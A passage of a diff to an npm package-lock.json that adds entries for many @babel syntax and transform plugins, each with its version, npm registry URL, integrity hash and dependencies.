"https://registry.npmjs.org/@babel/plugin-syntax-export-namespace-from/-/plugin-syntax-export-namespace-from-7.8.3.tgz", + "integrity": "sha512-MXf5laXo6c1IbEbegDmzGPwGNTsHZmEy6QGznu5Sh2UCWvueywb2ee+CCE4zQiZstxU9BMoQO9i6zUFSY0Kj0Q==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.8.3" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-flow": { + "version": "7.25.9", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-flow/-/plugin-syntax-flow-7.25.9.tgz", + "integrity": 
"sha512-F3FVgxwamIRS3+kfjNaPARX0DSAiH1exrQUVajXiR34hkdA9eyK+8rJbnu55DQjKL/ayuXqjNr2HDXwBEMEtFQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.25.9" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-import-assertions": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-assertions/-/plugin-syntax-import-assertions-7.24.7.tgz", + "integrity": "sha512-Ec3NRUMoi8gskrkBe3fNmEQfxDvY8bgfQpz6jlk/41kX9eUjvpyqWU7PBP/pLAvMaSQjbMNKJmvX57jP+M6bPg==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-import-attributes": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-attributes/-/plugin-syntax-import-attributes-7.24.7.tgz", + "integrity": "sha512-hbX+lKKeUMGihnK8nvKqmXBInriT3GVjzXKFriV3YC6APGxMbP8RZNFwy91+hocLXq90Mta+HshoB31802bb8A==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-import-meta": { + "version": "7.10.4", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", + "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.10.4" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-json-strings": { + "version": "7.8.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", + "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.8.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-jsx": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.24.7.tgz", + "integrity": "sha512-6ddciUPe/mpMnOKv/U+RSd2vvVy+Yw/JfBB0ZHYjEZt9NLHmCUylNYlsbqCCS1Bffjlb0fCwC9Vqz+sBz6PsiQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-logical-assignment-operators": { + "version": "7.10.4", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", + "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.10.4" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { + "version": "7.8.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", + "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", + "dev": true, + "dependencies": { + 
"@babel/helper-plugin-utils": "^7.8.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-numeric-separator": { + "version": "7.10.4", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", + "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.10.4" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-object-rest-spread": { + "version": "7.8.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", + "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.8.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-optional-catch-binding": { + "version": "7.8.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", + "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.8.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-optional-chaining": { + "version": "7.8.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", + "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.8.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-private-property-in-object": { + "version": "7.14.5", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-private-property-in-object/-/plugin-syntax-private-property-in-object-7.14.5.tgz", + "integrity": "sha512-0wVnp9dxJ72ZUJDV27ZfbSj6iHLoytYZmh3rFcxNnvsJF3ktkzLDZPy/mA17HGsaQT3/DQsWYX1f1QGWkCoVUg==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.14.5" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-top-level-await": { + "version": "7.14.5", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", + "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.14.5" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-typescript": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.24.7.tgz", + "integrity": "sha512-c/+fVeJBB0FeKsFvwytYiUD+LBvhHjGSI0g446PRGdSVGZLRNArBUno2PETbAly3tpiNAQR5XaZ+JslxkotsbA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + 
"node_modules/@babel/plugin-syntax-unicode-sets-regex": { + "version": "7.18.6", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-unicode-sets-regex/-/plugin-syntax-unicode-sets-regex-7.18.6.tgz", + "integrity": "sha512-727YkEAPwSIQTv5im8QHz3upqp92JTWhidIC81Tdx4VJYIte/VndKf1qKrfnnhPLiPghStWfvC/iFaMCQu7Nqg==", + "dev": true, + "dependencies": { + "@babel/helper-create-regexp-features-plugin": "^7.18.6", + "@babel/helper-plugin-utils": "^7.18.6" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/plugin-transform-arrow-functions": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-arrow-functions/-/plugin-transform-arrow-functions-7.24.7.tgz", + "integrity": "sha512-Dt9LQs6iEY++gXUwY03DNFat5C2NbO48jj+j/bSAz6b3HgPs39qcPiYt77fDObIcFwj3/C2ICX9YMwGflUoSHQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-async-generator-functions": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-async-generator-functions/-/plugin-transform-async-generator-functions-7.25.0.tgz", + "integrity": "sha512-uaIi2FdqzjpAMvVqvB51S42oC2JEVgh0LDsGfZVDysWE8LrJtQC2jvKmOqEYThKyB7bDEb7BP1GYWDm7tABA0Q==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/helper-remap-async-to-generator": "^7.25.0", + "@babel/plugin-syntax-async-generators": "^7.8.4", + "@babel/traverse": "^7.25.0" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-async-to-generator": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-async-to-generator/-/plugin-transform-async-to-generator-7.24.7.tgz", + "integrity": "sha512-SQY01PcJfmQ+4Ash7NE+rpbLFbmqA2GPIgqzxfFTL4t1FKRq4zTms/7htKpoCUI9OcFYgzqfmCdH53s6/jn5fA==", + "dev": true, + "dependencies": { + "@babel/helper-module-imports": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/helper-remap-async-to-generator": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-block-scoped-functions": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-block-scoped-functions/-/plugin-transform-block-scoped-functions-7.24.7.tgz", + "integrity": "sha512-yO7RAz6EsVQDaBH18IDJcMB1HnrUn2FJ/Jslc/WtPPWcjhpUJXU/rjbwmluzp7v/ZzWcEhTMXELnnsz8djWDwQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-block-scoping": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-block-scoping/-/plugin-transform-block-scoping-7.25.0.tgz", + "integrity": "sha512-yBQjYoOjXlFv9nlXb3f1casSHOZkWr29NX+zChVanLg5Nc157CrbEX9D7hxxtTpuFy7Q0YzmmWfJxzvps4kXrQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.8" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-class-properties": { + "version": "7.24.7", + "resolved": 
"https://registry.npmjs.org/@babel/plugin-transform-class-properties/-/plugin-transform-class-properties-7.24.7.tgz", + "integrity": "sha512-vKbfawVYayKcSeSR5YYzzyXvsDFWU2mD8U5TFeXtbCPLFUqe7GyCgvO6XDHzje862ODrOwy6WCPmKeWHbCFJ4w==", + "dev": true, + "dependencies": { + "@babel/helper-create-class-features-plugin": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-class-static-block": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-class-static-block/-/plugin-transform-class-static-block-7.24.7.tgz", + "integrity": "sha512-HMXK3WbBPpZQufbMG4B46A90PkuuhN9vBCb5T8+VAHqvAqvcLi+2cKoukcpmUYkszLhScU3l1iudhrks3DggRQ==", + "dev": true, + "dependencies": { + "@babel/helper-create-class-features-plugin": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/plugin-syntax-class-static-block": "^7.14.5" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.12.0" + } + }, + "node_modules/@babel/plugin-transform-classes": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-classes/-/plugin-transform-classes-7.25.0.tgz", + "integrity": "sha512-xyi6qjr/fYU304fiRwFbekzkqVJZ6A7hOjWZd+89FVcBqPV3S9Wuozz82xdpLspckeaafntbzglaW4pqpzvtSw==", + "dev": true, + "dependencies": { + "@babel/helper-annotate-as-pure": "^7.24.7", + "@babel/helper-compilation-targets": "^7.24.8", + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/helper-replace-supers": "^7.25.0", + "@babel/traverse": "^7.25.0", + "globals": "^11.1.0" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-computed-properties": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-computed-properties/-/plugin-transform-computed-properties-7.24.7.tgz", + "integrity": "sha512-25cS7v+707Gu6Ds2oY6tCkUwsJ9YIDbggd9+cu9jzzDgiNq7hR/8dkzxWfKWnTic26vsI3EsCXNd4iEB6e8esQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/template": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-destructuring": { + "version": "7.24.8", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-destructuring/-/plugin-transform-destructuring-7.24.8.tgz", + "integrity": "sha512-36e87mfY8TnRxc7yc6M9g9gOB7rKgSahqkIKwLpz4Ppk2+zC2Cy1is0uwtuSG6AE4zlTOUa+7JGz9jCJGLqQFQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.8" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-dotall-regex": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-dotall-regex/-/plugin-transform-dotall-regex-7.24.7.tgz", + "integrity": "sha512-ZOA3W+1RRTSWvyqcMJDLqbchh7U4NRGqwRfFSVbOLS/ePIP4vHB5e8T8eXcuqyN1QkgKyj5wuW0lcS85v4CrSw==", + "dev": true, + "dependencies": { + "@babel/helper-create-regexp-features-plugin": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-duplicate-keys": { + "version": "7.24.7", + "resolved": 
"https://registry.npmjs.org/@babel/plugin-transform-duplicate-keys/-/plugin-transform-duplicate-keys-7.24.7.tgz", + "integrity": "sha512-JdYfXyCRihAe46jUIliuL2/s0x0wObgwwiGxw/UbgJBr20gQBThrokO4nYKgWkD7uBaqM7+9x5TU7NkExZJyzw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-duplicate-named-capturing-groups-regex": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-duplicate-named-capturing-groups-regex/-/plugin-transform-duplicate-named-capturing-groups-regex-7.25.0.tgz", + "integrity": "sha512-YLpb4LlYSc3sCUa35un84poXoraOiQucUTTu8X1j18JV+gNa8E0nyUf/CjZ171IRGr4jEguF+vzJU66QZhn29g==", + "dev": true, + "dependencies": { + "@babel/helper-create-regexp-features-plugin": "^7.25.0", + "@babel/helper-plugin-utils": "^7.24.8" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/plugin-transform-dynamic-import": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-dynamic-import/-/plugin-transform-dynamic-import-7.24.7.tgz", + "integrity": "sha512-sc3X26PhZQDb3JhORmakcbvkeInvxz+A8oda99lj7J60QRuPZvNAk9wQlTBS1ZynelDrDmTU4pw1tyc5d5ZMUg==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/plugin-syntax-dynamic-import": "^7.8.3" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-exponentiation-operator": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-exponentiation-operator/-/plugin-transform-exponentiation-operator-7.24.7.tgz", + "integrity": "sha512-Rqe/vSc9OYgDajNIK35u7ot+KeCoetqQYFXM4Epf7M7ez3lWlOjrDjrwMei6caCVhfdw+mIKD4cgdGNy5JQotQ==", + "dev": true, + "dependencies": { + "@babel/helper-builder-binary-assignment-operator-visitor": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-export-namespace-from": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-export-namespace-from/-/plugin-transform-export-namespace-from-7.24.7.tgz", + "integrity": "sha512-v0K9uNYsPL3oXZ/7F9NNIbAj2jv1whUEtyA6aujhekLs56R++JDQuzRcP2/z4WX5Vg/c5lE9uWZA0/iUoFhLTA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/plugin-syntax-export-namespace-from": "^7.8.3" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-flow-strip-types": { + "version": "7.25.9", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-flow-strip-types/-/plugin-transform-flow-strip-types-7.25.9.tgz", + "integrity": "sha512-/VVukELzPDdci7UUsWQaSkhgnjIWXnIyRpM02ldxaVoFK96c41So8JcKT3m0gYjyv7j5FNPGS5vfELrWalkbDA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.25.9", + "@babel/plugin-syntax-flow": "^7.25.9" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-for-of": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-for-of/-/plugin-transform-for-of-7.24.7.tgz", + "integrity": 
"sha512-wo9ogrDG1ITTTBsy46oGiN1dS9A7MROBTcYsfS8DtsImMkHk9JXJ3EWQM6X2SUw4x80uGPlwj0o00Uoc6nEE3g==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/helper-skip-transparent-expression-wrappers": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-function-name": { + "version": "7.25.1", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-function-name/-/plugin-transform-function-name-7.25.1.tgz", + "integrity": "sha512-TVVJVdW9RKMNgJJlLtHsKDTydjZAbwIsn6ySBPQaEAUU5+gVvlJt/9nRmqVbsV/IBanRjzWoaAQKLoamWVOUuA==", + "dev": true, + "dependencies": { + "@babel/helper-compilation-targets": "^7.24.8", + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/traverse": "^7.25.1" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-json-strings": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-json-strings/-/plugin-transform-json-strings-7.24.7.tgz", + "integrity": "sha512-2yFnBGDvRuxAaE/f0vfBKvtnvvqU8tGpMHqMNpTN2oWMKIR3NqFkjaAgGwawhqK/pIN2T3XdjGPdaG0vDhOBGw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/plugin-syntax-json-strings": "^7.8.3" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-literals": { + "version": "7.25.2", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-literals/-/plugin-transform-literals-7.25.2.tgz", + "integrity": "sha512-HQI+HcTbm9ur3Z2DkO+jgESMAMcYLuN/A7NRw9juzxAezN9AvqvUTnpKP/9kkYANz6u7dFlAyOu44ejuGySlfw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.8" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-logical-assignment-operators": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-logical-assignment-operators/-/plugin-transform-logical-assignment-operators-7.24.7.tgz", + "integrity": "sha512-4D2tpwlQ1odXmTEIFWy9ELJcZHqrStlzK/dAOWYyxX3zT0iXQB6banjgeOJQXzEc4S0E0a5A+hahxPaEFYftsw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/plugin-syntax-logical-assignment-operators": "^7.10.4" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-member-expression-literals": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-member-expression-literals/-/plugin-transform-member-expression-literals-7.24.7.tgz", + "integrity": "sha512-T/hRC1uqrzXMKLQ6UCwMT85S3EvqaBXDGf0FaMf4446Qx9vKwlghvee0+uuZcDUCZU5RuNi4781UQ7R308zzBw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-modules-amd": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-modules-amd/-/plugin-transform-modules-amd-7.24.7.tgz", + "integrity": "sha512-9+pB1qxV3vs/8Hdmz/CulFB8w2tuu6EB94JZFsjdqxQokwGa9Unap7Bo2gGBGIvPmDIVvQrom7r5m/TCDMURhg==", + "dev": true, + "dependencies": { + "@babel/helper-module-transforms": "^7.24.7", + 
"@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-modules-commonjs": { + "version": "7.24.8", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-modules-commonjs/-/plugin-transform-modules-commonjs-7.24.8.tgz", + "integrity": "sha512-WHsk9H8XxRs3JXKWFiqtQebdh9b/pTk4EgueygFzYlTKAg0Ud985mSevdNjdXdFBATSKVJGQXP1tv6aGbssLKA==", + "dev": true, + "dependencies": { + "@babel/helper-module-transforms": "^7.24.8", + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/helper-simple-access": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-modules-systemjs": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-modules-systemjs/-/plugin-transform-modules-systemjs-7.25.0.tgz", + "integrity": "sha512-YPJfjQPDXxyQWg/0+jHKj1llnY5f/R6a0p/vP4lPymxLu7Lvl4k2WMitqi08yxwQcCVUUdG9LCUj4TNEgAp3Jw==", + "dev": true, + "dependencies": { + "@babel/helper-module-transforms": "^7.25.0", + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/helper-validator-identifier": "^7.24.7", + "@babel/traverse": "^7.25.0" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-modules-umd": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-modules-umd/-/plugin-transform-modules-umd-7.24.7.tgz", + "integrity": "sha512-3aytQvqJ/h9z4g8AsKPLvD4Zqi2qT+L3j7XoFFu1XBlZWEl2/1kWnhmAbxpLgPrHSY0M6UA02jyTiwUVtiKR6A==", + "dev": true, + "dependencies": { + "@babel/helper-module-transforms": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-named-capturing-groups-regex": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-named-capturing-groups-regex/-/plugin-transform-named-capturing-groups-regex-7.24.7.tgz", + "integrity": "sha512-/jr7h/EWeJtk1U/uz2jlsCioHkZk1JJZVcc8oQsJ1dUlaJD83f4/6Zeh2aHt9BIFokHIsSeDfhUmju0+1GPd6g==", + "dev": true, + "dependencies": { + "@babel/helper-create-regexp-features-plugin": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/plugin-transform-new-target": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-new-target/-/plugin-transform-new-target-7.24.7.tgz", + "integrity": "sha512-RNKwfRIXg4Ls/8mMTza5oPF5RkOW8Wy/WgMAp1/F1yZ8mMbtwXW+HDoJiOsagWrAhI5f57Vncrmr9XeT4CVapA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-nullish-coalescing-operator": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-nullish-coalescing-operator/-/plugin-transform-nullish-coalescing-operator-7.24.7.tgz", + "integrity": "sha512-Ts7xQVk1OEocqzm8rHMXHlxvsfZ0cEF2yomUqpKENHWMF4zKk175Y4q8H5knJes6PgYad50uuRmt3UJuhBw8pQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3" + }, + 
"engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-numeric-separator": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-numeric-separator/-/plugin-transform-numeric-separator-7.24.7.tgz", + "integrity": "sha512-e6q1TiVUzvH9KRvicuxdBTUj4AdKSRwzIyFFnfnezpCfP2/7Qmbb8qbU2j7GODbl4JMkblitCQjKYUaX/qkkwA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/plugin-syntax-numeric-separator": "^7.10.4" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-object-assign": { + "version": "7.23.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-object-assign/-/plugin-transform-object-assign-7.23.3.tgz", + "integrity": "sha512-TPJ6O7gVC2rlQH2hvQGRH273G1xdoloCj9Pc07Q7JbIZYDi+Sv5gaE2fu+r5E7qK4zyt6vj0FbZaZTRU5C3OMA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.22.5" + }, + "engines": { + "node": 